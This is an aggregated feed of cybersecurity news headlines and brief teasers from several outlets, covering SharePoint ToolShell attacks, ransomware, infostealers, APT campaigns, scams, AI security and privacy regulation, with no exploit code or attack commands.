CISA releases malware analysis for SharePoint Server attack

Indications of compromise and Sigma rules report for your security scanners amid ongoing 'ToolShell' blitz

CISA has published a malware analysis report with compromise indicators and Sigma rules for "ToolShell" attacks targeting specific Microsoft SharePoint Server versions.…

KLM, Air France latest major organizations looted for customer data

Watch out, the phishermen are about, customers told

European airline giants Air France and KLM say they are the latest in a string of major organizations to have their customers' data stolen by way of a break-in at a third party org.…

Meta training AI on social media posts? Only 7% in Europe think it's OK

Privacy campaigner Max Schrems' Noyb is back on Zuck's back

Updated  Meta's enthusiasm for training its AI on user data is not shared by the users themselves – at least for some Europeans – according to a study commissioned by Facebook legal nemesis Max Schrems and his privacy advocacy group Noyb.…

Amnesty slams Elon Musk's X for 'central role' in fueling 2024 UK riots

Human rights org calls for greater accountability and stronger enforcement of Online Safety Act

Amnesty International claims Elon Musk's X platform "played a central role" in pushing the misinformation that stoked racially charged violence following last year's Southport murders.…

Could agentic AI save us from the cybercrisis?

Many hands make light work in the SOC

Sponsored feature  The cyberthreat landscape is evolving fast, with highly organized bad actors launching ever more devastating and sophisticated attacks against often ill-prepared targets.

Microsoft researchers bullish on AI security agent even though it let 74% of malware slip through

Project Ire promises to use LLMs to detect whether code is malicious or benign

Updated  Microsoft has rolled out an autonomous AI agent that it claims can detect malware without human assistance.…

Google says the group behind last year's Snowflake attack slurped data from one of its Salesforce instances

ShinyHunters suspected in rash of intrusions

Google confirmed that criminals breached one of its Salesforce databases and stole info belonging to some of its small-and-medium-business customers.…

Vibe coding tool Cursor's MCP implementation allows persistent code execution

More evidence that AI expands the attack surface

Check Point researchers uncovered a remote code execution bug in popular vibe-coding AI tool Cursor that could allow an attacker to poison developer environments by secretly modifying a previously approved Model Context Protocol (MCP) configuration, silently swapping it for a malicious command without any user prompt.…

Patch now: Millions of Dell PCs with Broadcom chips vulnerable to attack

Psst, wanna steal someone's biometrics?

Black Hat  Critical security flaws in Broadcom chips used in more than 100 models of Dell computers could allow attackers to take over tens of millions of users' devices, steal passwords, and access sensitive data, including fingerprint information, according to Cisco Talos.…

Study finds humans not completely useless at malware detection

Some pinpointed software nasties but were suspicious of printer drivers too

Researchers from the Universities of Guelph and Waterloo have discovered exactly how users decide whether an application is legitimate or malware before installing it – and the good news is they're better than you might expect, at least when primed to expect malware.…

Chained bugs in Nvidia's Triton Inference Server lead to full system compromise

Wiz Research details flaws in Python backend that expose AI models and enable remote code execution

Security researchers have lifted the lid on a chain of high-severity vulnerabilities that could lead to remote code execution (RCE) on Nvidia's Triton Inference Server.…

Hacker summer camp: What to expect from BSides, Black Hat, and DEF CON

These are the conference events to keep an eye on. You can even stream a few

The security industry is hitting Vegas hard this week with three conferences in Sin City that bring the world's largest collection of security pros together for the annual summer camp.…

Antivirus vendors fail to spot persistent, nasty, stealthy Linux backdoor

'Plague' malware has been around for months without tripping alarms

Updated  Researchers at German infosec services company Nextron Threat have spotted malware that creates a highly-persistent Linux backdoor and said that antivirus engines did not initially flag the code as malicious.…

SonicWall investigates 'cyber incidents,' including ransomware targeting suspected 0-day

Bypassing MFA and deploying ransomware…sounds like something that rhymes with 'schmero-day'

SonicWall on Monday confirmed that it's investigating a rash of ransomware activity targeting its firewall devices, following multiple reports of a zero-day bug under active exploit in its VPNs.…

Python-powered malware snags hundreds of credit cards, 200K passwords, and 4M cookies

PXA Stealer pilfers data from nearly 40 browsers, including Chrome

More than 4,000 victims across 62 countries have been infected by stealthy infostealers pilfering people's passwords, credit card numbers, and browser cookies, which are then sold to other criminals on Telegram-based marketplaces.…

Mozilla flags phishing wave aimed at hijacking trusted Firefox add-ons

Devs told to exercise 'extreme caution' with emails disguised as account update prompts

Mozilla is warning of an ongoing phishing campaign targeting developers of Firefox add-ons.…

German phone repair biz collapses following 2023 ransomware attack

Founder miffed over prosecutors holding onto its Bitcoin

The founder of a German mobile phone repair and insurance biz has begun insolvency proceedings for some operations in his company after struggling financially following a costly ransomware attack in 2023.…

When hyperscalers can’t safeguard one nation’s data from another, dark clouds are ahead

If it’s not on-prem, it’s on the menu

Opinion  The details of cloud data regionalization are rarely the stuff of great drama. When they’ve reached the level of an exec admitting to the Senate that a foreign power can help itself to that nation's data, no matter where it lives, things get interesting.…

Millions of age checks performed as UK Online Safety Act gets rolling

But it's OK, claims Brit government, no personal data stored 'unless absolutely necessary'

The UK government has reported that an additional five million age checks are being made daily as UK-based internet users seek to access age-restricted sites following the implementation of the Online Safety Act.…

China’s botched Great Firewall upgrade invites attacks on its censorship infrastructure

Attempts to censor QUIC traffic create chance to block access to offshore DNS resolvers

China’s attempts to censor traffic carried using Quick UDP Internet Connections (QUIC) are imperfect and have left the country at risk of attacks that degrade its censorship apparatus, or even cut access to offshore DNS resolvers.…

Lazarus Group rises again, this time with malware-laden fake FOSS

PLUS: Slow MFA rollout costs Canucks $5m; Lawmakers ponder Stingray ban; MSFT tightens Teams; And more!

Infosec In Brief  North Korea’s Lazarus Group has changed tactics and is now creating malware-laden open source software.…

Silent Push CEO on cybercrime takedowns: 'It's an ongoing cat-and-mouse game'

Plus: why takedowns aren't in threat-intel analysts' best interest

Interview  It started out small: One US financial services company wanted to stop unknown crooks from spoofing their trading app, tricking customers into giving the digital thieves their login credentials and account information, thus allowing them to drain their accounts.…

CISA roasts unnamed critical national infrastructure body for shoddy security hygiene

Plaintext passwords, shared admin accounts, and insufficient logging rampant at mystery org

CISA is using the findings from a recent probe of an unidentified critical infrastructure organization to warn about the dangers of getting cybersecurity seriously wrong.…

OpenAI removes ChatGPT self-doxing option

Checkbox to make chatbot conversations appear in search engines deemed a footgun

OpenAI has removed the option to make ChatGPT interactions indexable by search engines to prevent users from unwittingly exposing sensitive information.…

Tested: Microsoft Recall can still capture credit cards and passwords, a treasure trove for crooks

Our tests have shown there are ways to get around the promised security improvements

Exclusive  Microsoft Recall, the AI app that takes screenshots of what you do on your PC so you can search for it later, has a filter that's supposed to prevent it from screenshotting sensitive info like credit card numbers. But a Register test shows that it still fails in many cases, creating a potential treasure trove for thieves.…

China says US spies exploited Microsoft Exchange zero-day to steal military info

Spy vs. spy

China has accused US intelligence agencies of exploiting a Microsoft Exchange zero-day to steal defense-related data and take over more than 50 devices belonging to a "major Chinese military enterprise" for nearly a year.…

Florida prison email blunder exposes visitor contact info to inmates

Victims fear leak at Everglades Correctional Institution could lead to violent extortion

A data breach at a Florida prison has inmates' families concerned for their welfare after their contact details were allegedly leaked to convicted criminals.…

Cybercrooks attached Raspberry Pi to bank network and drained ATM cash

Criminals used undocumented techniques and well-placed insiders to remotely withdraw money

A ring of cybercriminals managed to physically implant a Raspberry Pi on a bank's network to steal cash from an Indonesian ATM.…

Top spy says LinkedIn profiles that list defense work 'recklessly invite attention of foreign intelligence services'

Workers on joint US/UK/Australia nuclear submarine program are painting a target on themselves

The Director-General of Security at the Australian Security Intelligence Organization (ASIO) has lamented the fact that many people list their work in the intelligence community or on sensitive military projects in their LinkedIn profiles.…

As ransomware gangs threaten physical harm, 'I am afraid of what's next,' ex-negotiator says

Crims warned 40% of respondents that they and their families would suffer

Ransomware gangs now frequently threaten physical violence against employees and their families as a way to force victim organizations into paying their demands.…

Gene scanner pays $9.8 million to get feds off its back in security flap

Illumina allegedly lied about its testing devices meeting government standards

Biotech firm Illumina has agreed to cut the US government a check for the eminently affordable amount of $9.8 million to resolve allegations that it has been selling the feds genetic testing systems riddled with security vulnerabilities the company knew about but never bothered to fix.…

Microsoft's Azure AI Speech needs just seconds of audio to spit out a convincing deepfake

No way this will be abused

Microsoft has upgraded Azure AI Speech so that users can rapidly generate a voice replica with just a few seconds of sampled speech.…

Beijing summons Nvidia over alleged backdoors in China-bound AI chips

H20 silicon under the microscope after slipping through US export bans

China's internet watchdog has hauled Nvidia in for a grilling over alleged backdoors in its H20 chips, the latest twist in the increasingly paranoid semiconductor spat between Washington and Beijing.…

Kremlin goons caught abusing ISPs to spy on Moscow-based diplomats, Microsoft says

Russia spying on foreign embassies? Say it ain't so

Russian cyberspies are abusing local internet service providers' networks to target foreign embassies in Moscow and collect intel from diplomats' devices, according to a Microsoft Threat Intelligence warning.…

Silk Typhoon spun a web of patents for offensive cyber tools, report says

US court docs reveal that infamous Chinese snoops filed IP papers like tax returns

Security researchers have uncovered more than a dozen patents for offensive cybersecurity tools filed by Chinese companies allegedly tied to Beijing's Silk Typhoon espionage crew.…

Brit watchdog pushes to rein in Microsoft and AWS with 'strategic market status'

Regulators around the globe pay attention as results of 21-month cloud probe published

Britain's competition regulator says Microsoft and AWS are using their dominance to harm UK cloud customers and proposes to designate both with strategic market status (SMS) to take action against them.…

NHS disability equipment provider on brink of collapse a year after cyberattack

Government officials say they are monitoring the situation

A major supplier of healthcare equipment to the UK's National Health Service and local councils is on the verge of collapse 16 months after falling victim to cyber criminals.…

Banning VPNs to protect kids? Good luck with that

UK's Online Safety Act kicks off about as well as everyone expected

Analysis: With the UK's Online Safety Act (OSA) now in effect, it was only a matter of time before tech-savvy under-18s figured out how to bypass the rules and regain access to adult content.…

Internet exchange points are ignored, vulnerable, and absent from infrastructure protection plans

Italian operator calls for lawmakers to wake up to the critical role played by peering

Internet Exchange Points are an underappreciated resource that all internet users rely on, but governments have unfortunately ignored them, despite their status as critical infrastructure.…

Lethal Cambodia-Thailand border clash linked to cyber-scam slave camps

Infosec issues spill into the real world and regional politics

Analysis: Thai and Cambodian tensions relating to issues including cybersecurity concerns boiled over into a kinetic skirmish at the border last week.…

The TSA likes facial recognition at airports. Passengers and politicians, not so much

Few passengers are told they can opt out, and when they do, airport staff may push back

US lawmakers are trying to extend the use of facial recognition at airports, despite many airline passengers objecting to the practice.…

Enterprises neglect AI security – and attackers have noticed

IBM report shows a rush to embrace technology without safeguarding it, and as for governance...

Organizations rushing to implement AI are neglecting security and governance, IBM claims, with attackers already taking advantage of lax protocols to target models and applications.…

Users left scrambling for a plan B as Dropbox drops Dropbox Passwords

Read-only in weeks, deleted forever in months

Dropbox has given users of its password manager until the end of October to extract their data before pulling the plug on the service.…

Minnesota governor calls in the troops after St Paul cyberattack

'This was a deliberate, coordinated, digital attack'

Minnesota Governor Tim Walz has activated the state's National Guard and declared a state of emergency in response to a cyberattack on the city of Saint Paul.…

Palo Alto Networks inks $25b deal to buy identity-security shop CyberArk

The lure? Identity security and privileged access management tools to verify humans and... machines

Palo Alto Networks will buy Israeli security biz CyberArk in a $25 billion cash-and-stock deal confirmed today.…

Bouygues Telecom Data Breach Exposes 6.4 Million Customer Records

Bouygues Telecom revealed the attackers stole personal data of 6.4 million customers, including contact details, contractual data and international bank account numbers

#BHUSA: 1000 DoD Contractors Now Covered by NSA’s Free Cyber Services Program

The NSA’s CAPT program, launched in 2024 with Horizon3.ai, now benefits 1000 of the 300,000 US Defense Industrial Base companies

#BHUSA: Microsoft Debuts AI Agent Able to Reverse Engineer Malware

A new Microsoft AI agent, named Project Ire, is able to autonomously classify malware at a global scale with a high level of precision

New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at Risk

Microsoft Exchange customers have been urged to apply fixes set out in a hybrid deployment security update published in April

Google Among Victims in Ongoing Salesforce Data Theft Campaign

Google confirms it was among the victims of an ongoing data theft campaign targeting Salesforce instances, where publicly available business names and contact details were retrieved by the threat actor

Experts Alarmed by UK Government’s Companies House ID Checks

A UK government initiative to tackle Companies House fraud has raised security concerns

SonicWall: Attacks Linked to Legacy Bug and Password Use

SonicWall has claimed an uptick in Akira ransomware intrusions is due to legacy password use

#BHUSA: Security Researchers Uncover Critical Flaws in Axis CCTV Software

Claroty researchers have uncovered four vulnerabilities in a proprietary protocol used by surveillance equipment manufacturer Axis Communications

#BHUSA: Researchers Expose Infrastructure Behind Cybercrime Network VexTrio

According to Infoblox’s new report, the VexTrio cybercrime-enabling network originates from Italy and Eastern Europe

Clinical Data Stolen in Cyber-Attack on Kidney Dialysis Provider DaVita

The incident, reported to be ransomware-related, has resulted in attackers stealing sensitive personal and clinical data, including lab test results

#BHUSA: OpenAI Launches Red Teaming Challenge for New Open-Weight LLMs

GenAI company OpenAI has launched its first-ever open-weight models alongside a red teaming challenge

US Authorities Extradite Nigerian Man Accused of Hacking and Fraud

A Nigerian man accused of hacking, fraud and identity theft has been extradited from France to the US to face charges

August 2025 Patch Tuesday forecast: Try, try again

July turned into a surprisingly busy month. It started slowly with a fairly ‘calm’ Patch Tuesday as I forecasted in my last blog. Although there were 130 new CVEs addressed across all the Microsoft releases, there was only one publicly disclosed CVE, so the risk was low. But a short time later, two CVEs in SharePoint were reported exploited, and the month started to heat up with hotfixes near the end of the month. Mix … More

The post August 2025 Patch Tuesday forecast: Try, try again appeared first on Help Net Security.

Third-party partners or ticking time bombs?

In this Help Net Security video, Ngaire Elizabeth Guzzetti, Technical Director Supply Chain at CyXcel, discusses why a third of U.S. organizations don’t trust third-party vendors to manage critical risks and what that means for supply chain security. She breaks down the root causes of this trust gap, including poor visibility, inadequate governance, and the growing complexity introduced by AI. Guzzetti also shares practical guidance for building more resilient vendor relationships through tiered oversight, continuous … More

The post Third-party partners or ticking time bombs? appeared first on Help Net Security.

From fake CAPTCHAs to RATs: Inside 2025’s cyber deception threat trends

Cybercriminals are getting better at lying. That’s the takeaway from a new LevelBlue report, which outlines how attackers are using social engineering and legitimate tools to quietly move through environments before they’re caught.

[Figure: data showing at what stage an incident was detected (Source: LevelBlue)]

In that short window, the number of customers affected by security incidents nearly tripled. The rate jumped from 6 percent in late 2024 to 17 percent in early 2025. More than … More

The post From fake CAPTCHAs to RATs: Inside 2025’s cyber deception threat trends appeared first on Help Net Security.

Fraud controls don’t guarantee consumer trust

Over a third of companies say they are using AI, including generative AI, to fight fraud, according to Experian. As fraud threats become more complex, companies are accelerating their investments with over half adopting new analytics and building AI models to enhance customer decision-making. The AI paradox AI is playing a double role in the fight against fraud. It’s helping businesses detect threats faster, but it’s also fueling new scams like deepfakes and impersonation. Agentic … More

The post Fraud controls don’t guarantee consumer trust appeared first on Help Net Security.

New infosec products of the week: August 8, 2025

Here’s a look at the most interesting products from the past week, featuring releases from Black Kite, Descope, Elastic, ExtraHop, LastPass, and Riverbed. Elastic AI SOC Engine helps SOC teams expose hidden threats Elastic AI SOC Engine (EASE) is a new serverless, easy-to-deploy security package that brings AI-driven context-aware detection and triage into existing SIEM and EDR tools, without the need for an immediate migration or replacement. New Black Kite tool identifies which vendors are … More

The post New infosec products of the week: August 8, 2025 appeared first on Help Net Security.

What GPT‑5 means for IT teams, devs, and the future of AI at work

OpenAI has released GPT‑5, the newest version of its large language model. It’s now available to developers and ChatGPT users, and it brings some real changes to how AI can be used in business and IT environments.

[Figure: GPT‑5 (with thinking) performs better than OpenAI o3 with 50-80% fewer output tokens across capabilities, including visual reasoning, agentic coding, and graduate-level scientific problem solving (Source: OpenAI)]

Unlike previous versions, GPT‑5 uses a new approach behind the … More

The post What GPT‑5 means for IT teams, devs, and the future of AI at work appeared first on Help Net Security.

Microsoft urges admins to plug severe Exchange security hole (CVE-2025-53786)

“In an Exchange hybrid deployment, an attacker who first gains administrative access to an on-premises Exchange server could potentially escalate privileges within the organization’s connected cloud environment without leaving easily detectable and auditable traces,” Microsoft announced on Wednesday. The privilege escalation can be performed by exploiting CVE-2025-53786, a newly disclosed vulnerability that stems from Exchange Server and Exchange Online sharing the same service principal – i.e., the Office 365 Exchange Online application – in … More

The post Microsoft urges admins to plug severe Exchange security hole (CVE-2025-53786) appeared first on Help Net Security.

SonicWall: Attackers did not exploit zero-day vulnerability to compromise Gen 7 firewalls

Akira ransomware affiliates are not leveraging an unknown, zero-day vulnerability in SonicWall Gen 7 firewalls to breach corporate networks, the security vendor shared today. “Instead, there is a significant correlation with threat activity related to CVE-2024-40766, which was previously disclosed and documented in our public advisory.” What happened? Since July 15, 2025, researchers have observed a notable surge in ransomware activity targeting SonicWall firewalls, specifically via their SSL VPN functionality, and posited that the attackers … More

The post SonicWall: Attackers did not exploit zero-day vulnerability to compromise Gen 7 firewalls appeared first on Help Net Security.

Top solutions to watch after Black Hat USA 2025

Black Hat USA 2025 was packed with innovation, with companies showing off tools built to get ahead of what’s coming next. From smarter offensive security to new ways of spotting attacks faster, the conference had no shortage of exciting developments. Here are some of the products that stood out and could play a big role in where cybersecurity goes from here. Darwinium launches AI tools to detect and disrupt adversarial threats Darwinium launched Beagle and … More

The post Top solutions to watch after Black Hat USA 2025 appeared first on Help Net Security.

Photos: Black Hat USA 2025

Here’s a look inside Black Hat USA 2025. The featured vendors are: Stellar Cyber, Vonahi Security, Gurucul, Check Point, HackerOne, EasyDMARC, Elastic, Google, Tines, Veracode, VioletX, Pentera, Keep Aware, Oleria, SpyCloud, Trend Micro and Picus Security.

The post Photos: Black Hat USA 2025 appeared first on Help Net Security.

ESET Threat Report H1 2025: ClickFix, infostealer disruptions, and ransomware deathmatch

Threat actors are embracing ClickFix, ransomware gangs are turning on each other – toppling even the leaders – and law enforcement is disrupting one infostealer after another

Is your phone spying on you? | Unlocked 403 cybersecurity podcast (S2E5)

Here's what you need to know about the inner workings of modern spyware and how to stay away from apps that know too much

Why the tech industry needs to stand firm on preserving end-to-end encryption

Restricting end-to-end encryption on a single-country basis would not only be absurdly difficult to enforce, but it would also fail to deter criminal activity

This month in security with Tony Anscombe – July 2025 edition

Here's a look at cybersecurity stories that moved the needle, raised the alarm, or offered vital lessons in July 2025

The hidden risks of browser extensions – and how to stay safe

Not all browser add-ons are handy helpers – some may contain far more than you have bargained for

SharePoint under fire: ToolShell attacks hit organizations worldwide

The ToolShell bugs are being exploited by cybercriminals and APT groups alike, with the US on the receiving end of 13 percent of all attacks

ToolShell: An all-you-can-eat buffet for threat actors

ESET Research has been monitoring attacks involving the recently discovered ToolShell zero-day vulnerabilities

Rogue CAPTCHAs: Look out for phony verification pages spreading malware

Before rushing to prove that you're not a robot, be wary of deceptive human verification pages as an increasingly popular vector for delivering malware

Why is your data worth so much? | Unlocked 403 cybersecurity podcast (S2E4)

Behind every free online service, there's a price being paid. Learn why your digital footprint is so valuable, and when you might actually be the product.

Unmasking AsyncRAT: Navigating the labyrinth of forks

ESET researchers map out the labyrinthine relationships among the vast hierarchy of AsyncRAT variants

How to get into cybersecurity | Unlocked 403 cybersecurity podcast (S2E3)

Cracking the code of a successful cybersecurity career starts here. Hear from ESET's Robert Lipovsky as he reveals how to break into and thrive in this fast-paced field.

Task scams: Why you should never pay to get paid

Some schemes might sound unbelievable, but they’re easier to fall for than you think. Here’s how to avoid getting played by gamified job scams.

How government cyber cuts will affect you and your business

Deep cuts in cybersecurity spending risk creating ripple effects that will put many organizations at a higher risk of falling victim to cyberattacks

Gamaredon in 2024: Cranking out spearphishing campaigns against Ukraine with an evolved toolset

ESET Research analyzes Gamaredon’s updated cyberespionage toolset, new stealth-focused techniques, and aggressive spearphishing operations observed throughout 2024

ESET Threat Report H1 2025: Key findings

ESET Chief Security Evangelist Tony Anscombe looks at some of the report's standout findings and their implications for organizations in 2025

ESET APT Activity Report Q4 2024–Q1 2025: Malware sharing, wipers and exploits

ESET experts discuss Sandworm’s new data wiper, relentless campaigns by UnsolicitedBooker, attribution challenges amid tool-sharing, and other key findings from the latest APT Activity Report

This month in security with Tony Anscombe – June 2025 edition

From Australia's new ransomware payment disclosure rules to another record-breaking DDoS attack, June 2025 saw no shortage of interesting cybersecurity news

ESET Threat Report H1 2025

A view of the H1 2025 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts

BladedFeline: Whispering in the dark

ESET researchers analyzed a cyberespionage campaign conducted by BladedFeline, an Iran-aligned APT group with likely ties to OilRig

Don’t let dormant accounts become a doorway for cybercriminals

Do you have online accounts you haven't used in years? If so, a bit of digital spring cleaning might be in order.

This month in security with Tony Anscombe – May 2025 edition

From a flurry of attacks targeting UK retailers to campaigns corralling end-of-life routers into botnets, it's a wrap on another month filled with impactful cybersecurity news

Word to the wise: Beware of fake Docusign emails

Cybercriminals impersonate the trusted e-signature brand and send fake Docusign notifications to trick people into giving away their personal or corporate data

Danabot under the microscope

ESET Research has been tracking Danabot’s activity since 2018 as part of a global effort that resulted in a major disruption of the malware’s infrastructure

Danabot: Analyzing a fallen empire

ESET Research shares its findings on the workings of Danabot, an infostealer recently disrupted in a multinational law enforcement operation

Lumma Stealer: Down for the count

The bustling cybercrime enterprise has been dealt a significant blow in a global operation that relied on the expertise of ESET and other technology companies

ESET takes part in global operation to disrupt Lumma Stealer

Our intense monitoring of tens of thousands of malicious samples helped this global disruption operation

The who, where, and how of APT attacks in Q4 2024–Q1 2025

ESET Chief Security Evangelist Tony Anscombe highlights key findings from the latest issue of the ESET APT Activity Report

ESET APT Activity Report Q4 2024–Q1 2025

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2024 and Q1 2025

Sednit abuses XSS flaws to hit gov't entities, defense companies

Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU

Operation RoundPress

ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities

How can we counter online disinformation? | Unlocked 403 cybersecurity podcast (S2E2)

Ever wondered why a lie can spread faster than the truth? Tune in for an insightful look at disinformation and how we can fight one of the most pressing challenges facing our digital world.

Catching a phish with many faces

Here’s a brief dive into the murky waters of shape-shifting attacks that leverage dedicated phishing kits to auto-generate customized login pages on the fly

Beware of phone scams demanding money for ‘missed jury duty’

When we get the call, it’s our legal responsibility to attend jury service. But sometimes that call won’t come from the courts – it will be a scammer.

Toll road scams are in overdrive: Here’s how to protect yourself

Have you received a text message about an unpaid road toll? Make sure you’re not the next victim of a smishing scam.

RSAC 2025 wrap-up – Week in security with Tony Anscombe

From the power of collaborative defense to identity security and AI, catch up on the event's key themes and discussions

TheWizards APT group uses SLAAC spoofing to perform adversary-in-the-middle attacks

ESET researchers analyzed Spellbinder, a lateral movement tool used to perform adversary-in-the-middle attacks

This month in security with Tony Anscombe – April 2025 edition

From the near-demise of MITRE's CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity

How safe and secure is your iPhone really?

Your iPhone isn't necessarily as invulnerable to security threats as you may think. Here are the key dangers to watch out for and how to harden your device against bad actors.

Deepfake 'doctors' take to TikTok to peddle bogus cures

Look out for AI-generated 'TikDocs' who exploit the public's trust in the medical profession to drive sales of sketchy supplements

How fraudsters abuse Google Forms to spread scams

The form and quiz-building tool is a popular vector for social engineering and malware. Here’s how to stay safe.

Will super-smart AI be attacking us anytime soon?

What practical AI attacks exist today? “More than zero” is the answer – and they’re getting better.

CapCut copycats are on the prowl

Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead

They’re coming for your data: What are infostealers and how do I stay safe?

Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data

Attacks on the education sector are surging: How can cyber-defenders respond?

Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk?

Watch out for these traps lurking in search results

Here’s how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results

So your friend has been hacked: Could you be next?

When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe.

1 billion reasons to protect your identity online

Corporate data breaches are a gateway to identity fraud, but they’re not the only one. Here’s a lowdown on how your personal data could be stolen – and how to make sure it isn’t.

The good, the bad and the unknown of AI: A Q&A with Mária Bieliková

The computer scientist and AI researcher shares her thoughts on the technology’s potential and pitfalls – and what may lie ahead for us

This month in security with Tony Anscombe – March 2025 edition

From an exploited vulnerability in a third-party ChatGPT tool to a bizarre twist on ransomware demands, it's a wrap on another month filled with impactful cybersecurity news

Resilience in the face of ransomware: A key to business survival

Your company’s ability to tackle the ransomware threat head-on can ultimately be a competitive advantage

Making it stick: How to get the most out of cybersecurity training

Security awareness training doesn’t have to be a snoozefest – games and stories can help instill ‘sticky’ habits that will kick in when a danger is near

RansomHub affiliates linked to rival RaaS gangs

ESET researchers also examine the growing threat posed by tools that ransomware affiliates deploy in an attempt to disrupt EDR security solutions

FamousSparrow resurfaces to spy on targets in the US, Latin America

Once thought to be dormant, the China-aligned group has also been observed using the privately sold ShadowPad backdoor for the first time

Shifting the sands of RansomHub’s EDRKillShifter

ESET researchers discover new ties between affiliates of RansomHub and of rival gangs Medusa, BianLian, and Play

You will always remember this as the day you finally caught FamousSparrow

ESET researchers uncover the toolset used by the FamousSparrow APT group, including two undocumented versions of the group’s signature backdoor, SparrowDoor

Operation FishMedley

ESET researchers detail a global espionage operation by FishMonger, the APT group run by I‑SOON

MirrorFace updates toolset, expands targeting to Europe

The group's Operation AkaiRyū begins with targeted spearphishing emails that use the upcoming World Expo 2025 in Osaka, Japan, as a lure

Operation AkaiRyū: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor

ESET researchers uncovered MirrorFace activity that expanded beyond its usual focus on Japan and targeted a Central European diplomatic institute with the ANEL backdoor

AI's biggest surprises of 2024 | Unlocked 403 cybersecurity podcast (S2E1)

Here's what's been hot on the AI scene over the past 12 months, how it's changing the face of warfare, and how you can fight AI-powered scams

When IT meets OT: Cybersecurity for the physical world

While relatively rare, real-world incidents impacting operational technology highlight that organizations in critical infrastructure can’t afford to dismiss the OT threat

Don’t let cybercriminals steal your Spotify account

Listen up, this is sure to be music to your ears – a few minutes spent securing your account today can save you a ton of trouble tomorrow

AI-driven deception: A new face of corporate fraud

Malicious use of AI is reshaping the fraud landscape, creating major new risks for businesses

Kids behaving badly online? Here's what parents can do

By taking time to understand and communicate the impact of undesirable online behavior, you can teach your kids an invaluable set of life lessons for a new digital age

Martin Rees: Post-human intelligence – a cosmic perspective | Starmus highlights

Take a moment to think beyond our current capabilities and consider what might come next in the grand story of evolution

Threat Report H2 2024: Infostealer shakeup, new attack vector for mobile, and Nomani

Big shifts in the infostealer scene, novel attack vector against iOS and Android, and a massive surge in investment scams on social media

Bernhard Schölkopf: Is AI intelligent? | Starmus highlights

With AI's pattern recognition capabilities well-established, Mr. Schölkopf's talk shifts the focus to a pressing question: what will be the next great leap for AI?

This month in security with Tony Anscombe – February 2025 edition

Ransomware payments trending down, the cyber-resilience gap facing SMBs, and APT groups embracing generative AI – it's a wrap on another month filled with impactful security news

Laurie Anderson: Building an ARK | Starmus highlights

The pioneering multi-media artist reveals the creative process behind her stage show called ARK, which challenges audiences to reflect on some of the most pressing issues of our times

Fake job offers target software developers with infostealers

A North Korea-aligned activity cluster tracked by ESET as DeceptiveDevelopment drains victims' crypto wallets and steals their login details from web browsers and password managers

DeceptiveDevelopment targets freelance developers

ESET researchers analyzed a campaign delivering malware bundled with job interview challenges

No, you’re not fired – but beware of job termination scams

Some employment scams take an unexpected turn as cybercriminals shift from “hiring” to “firing” staff

Katharine Hayhoe: The most important climate equation | Starmus highlights

The atmospheric scientist makes a compelling case for a head-to-heart-to-hands connection as a catalyst for climate action

Gaming or gambling? Lifting the lid on in-game loot boxes

The virtual treasure chests and other casino-like rewards inside your children’s games may pose risks you shouldn’t play down

What is penetration testing? | Unlocked 403 cybersecurity podcast (ep. 10)

Ever wondered what it's like to hack for a living – legally? Learn about the art and thrill of ethical hacking and how white-hat hackers help organizations tighten up their security.

How AI-driven identity fraud is causing havoc

Deepfake fraud, synthetic identities, and AI-powered scams make identity theft harder to detect and prevent – here's how to fight back

Neil Lawrence: What makes us unique in the age of AI | Starmus highlights

As AI advances at a rapid clip, reshaping industries, automating tasks, and redefining what machines can achieve, one question looms large: what remains uniquely human?

Patch or perish: How organizations can master vulnerability management

Don’t wait for a costly breach to provide a painful reminder of the importance of timely software patching

Roeland Nusselder: AI will eat all our energy, unless we make it tiny | Starmus highlights

Left unchecked, AI's energy and carbon footprint could become a significant concern. Can our AI systems be far less energy-hungry without sacrificing performance?

How scammers are exploiting DeepSeek's rise

As is their wont, cybercriminals waste no time launching attacks that aim to cash in on the frenzy around the latest big thing – plus, what else to know before using DeepSeek

This month in security with Tony Anscombe – January 2025 edition

DeepSeek’s bursting onto the AI scene, apparent shifts in US cybersecurity policies, and a massive student data breach all signal another eventful year in cybersecurity and data privacy

Untrustworthy AI: How to deal with data poisoning

You should think twice before trusting your AI assistant, as database poisoning can markedly alter its output – even dangerously so

Brian Greene: Until the end of time | Starmus highlights

The renowned physicist explores how time and entropy shape the evolution of the universe, the nature of existence, and the eventual fate of everything, including humanity

Going (for) broke: 6 common online betting scams and how to avoid them

Don’t roll the dice on your online safety – watch out for bogus sports betting apps and other traps commonly set by scammers

The evolving landscape of data privacy: Key trends to shape 2025

Incoming laws, combined with broader developments on the threat landscape, will create further complexity and urgency for security and compliance teams

PlushDaemon compromises supply chain of Korean VPN service

ESET researchers have discovered a supply-chain attack against a VPN provider in South Korea by a new China-aligned APT group we have named PlushDaemon

Under lock and key: Protecting corporate data from cyberthreats in 2025

Data breaches can cause a loss of revenue and market value as a result of diminished customer trust and reputational damage

UEFI Secure Boot: Not so secure

ESET researchers uncover a vulnerability in a UEFI application that could enable attackers to deploy malicious bootkits on unpatched systems

Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344

The story of a signed UEFI application allowing a UEFI Secure Boot bypass

Cybersecurity and AI: What does 2025 have in store?

In the hands of malicious actors, AI tools can enhance the scale and severity of all manner of scams, disinformation campaigns and other threats

Protecting children online: Where Florida’s new law falls short

Some of the state’s new child safety law can be easily circumvented. Should it have gone further?

Crypto is soaring, but so are threats: Here’s how to keep your wallet safe

As detections of cryptostealers surge across Windows, Android and macOS, it's time for a refresher on how to keep your bitcoin or other crypto safe

State-aligned actors are increasingly deploying ransomware – and that’s bad news for everyone

The blurring of lines between cybercrime and state-sponsored attacks underscores the increasingly fluid and multifaceted nature of today’s cyberthreats

AI moves to your PC with its own special hardware

